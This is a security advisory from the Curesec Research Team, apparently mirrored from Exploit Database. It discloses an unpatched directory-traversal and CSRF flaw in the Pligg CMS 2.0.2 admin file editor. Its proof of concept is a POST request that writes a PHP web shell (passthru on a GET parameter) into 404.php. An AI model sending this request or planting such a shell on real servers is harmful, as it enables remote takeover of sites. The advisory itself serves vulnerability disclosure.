Pligg CMS 2.0.2 – Cross-Site Request Forgery / Code Execution

• Exploit Database
• 16 阅读

• 作者： Curesec Research Team
  日期： 2015-10-30
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/38579/

• Security Advisory - Curesec Research Team
  
  1. Introduction
  
  Affected Product:Pligg CMS 2.0.2
  Fixed in:not fixed
  Fixed Version Link:n/a
  Vendor Website:http://pligg.com/
  Vulnerability Type:Code Execution & CSRF
  Remote Exploitable:Yes
  Reported to vendor:09/01/2015
  Disclosed to public: 10/07/2015
  Release mode:Full Disclosure
  CVE: n/a
  CreditsTim Coen of Curesec GmbH
  
  2. Vulnerability Description
  
  The file editor provides the possibility to edit .tpl files stored in the
  templates directory.
  
  But the file editor is vulnerable to directory traversal when saving files, and
  it does not check the submitted filename against a whitelist of allowed files.
  It also does not check the file extension. Because of this, it is possible to
  gain code execution.
  
  Admin credentials are required to access the file editor, but the request does
  not have CSRF protection, so an attacker can gain code execution by getting the
  admin to visit a website they control while logged in.
  
  3. Proof of Concept
  
  
  POST /pligg-cms-master/admin/admin_editor.php HTTP/1.1
  
  the_file2=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fvar%2Fwww%2Fhtml%2Fpligg-cms-master%2F404.php&updatedfile=<?php passthru($_GET['x']); ?>&isempty=1&save=Save+Changes
  
  4. Solution
  
  This issue was not fixed by the vendor.
  
  5. Report Timeline
  
  09/01/2015 Informed Vendor about Issue (no reply)
  09/22/2015 Reminded Vendor of disclosure date
  09/22/2015 Vendor replied, issue has been send to staff
  09/29/2015 Reminded Vendor of disclosure date (no reply)
  10/07/2015 Disclosed to public
  
  
  Blog Reference:
  http://blog.curesec.com/article/blog/Pligg-CMS-202-Code-Execution--CSRF-80.html